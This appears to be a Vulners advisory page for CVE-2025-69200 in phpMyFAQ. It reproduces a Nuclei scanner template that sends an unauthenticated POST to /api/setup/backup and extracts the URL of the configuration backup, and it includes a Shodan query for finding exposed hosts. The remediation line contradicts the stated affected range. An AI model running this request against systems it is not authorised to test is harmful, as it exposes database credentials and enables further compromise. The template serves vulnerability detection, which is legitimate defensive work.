| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| CVE-2025-69200 | 29 Dec 202516:22 | – | circl | |
| phpMyFAQ 安全漏洞 | 29 Dec 202500:00 | – | cnnvd | |
| CVE-2025-69200 | 29 Dec 202515:24 | – | cve | |
| CVE-2025-69200 phpMyFAQ has unauthenticated config backup download via /api/setup/backup | 29 Dec 202515:24 | – | cvelist | |
| EUVD-2025-205600 | 30 Dec 202515:31 | – | euvd | |
| phpMyFAQ has unauthenticated config backup download via /api/setup/backup | 30 Dec 202515:31 | – | github | |
| CVE-2025-69200 | 29 Dec 202516:15 | – | nvd | |
| phpMyFAQ Improper Authorization Vulnerability (GHSA-9cg9-4h4f-j6fg) | 7 Jan 202600:00 | – | openvas | |
| CVE-2025-69200 phpMyFAQ has unauthenticated config backup download via /api/setup/backup | 29 Dec 202515:24 | – | osv | |
| GHSA-9CG9-4H4F-J6FG phpMyFAQ has unauthenticated config backup download via /api/setup/backup | 30 Dec 202515:31 | – | osv |
id: CVE-2025-69200
info:
name: phpMyFAQ - Configuration Backup Disclosure
author: Louay-075
severity: high
description: |
phpMyFAQ <= 4.0.16 contains an information disclosure vulnerability caused by unauthenticated access to configuration backup ZIP generation and download, letting remote attackers access sensitive configuration files, exploit requires no authentication.
impact: |
Remote attackers can access sensitive configuration files, exposing database credentials and enabling further compromise.
remediation: |
Update to version 4.0.16 or later.
reference:
- https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9cg9-4h4f-j6fg
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69200
- https://nvd.nist.gov/vuln/detail/CVE-2025-69200
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2025-69200
epss-score: 0.02005
epss-percentile: 0.78451
cwe-id: CWE-202
metadata:
verified: true
shodan-query: 'http.title:"phpMyFAQ"'
max-request: 1
product: phpmyfaq
vendor: phpmyfaq
tags: cve,cve2025,phpmyfaq,backup,exposure,vkev
http:
- raw:
- |
POST /api/setup/backup HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain
4.1.0-RC
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"backupFile":"'
- '.zip'
condition: and
- type: word
words:
- "error"
- "forbidden"
negative: true
- type: word
part: content_type
words:
- application/json
extractors:
- type: json
name: backup_url
json:
- '.backupFile'
# digest: 490a0046304402201ed3701a59b367b85a852b42d7faa89259bf6b74a7e7a05d86fcb6c4fa39f915022025d23a3614a35571fae7aabc9ea94a70810a6067f43eabd4f9825d6d2c8fa0d7:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation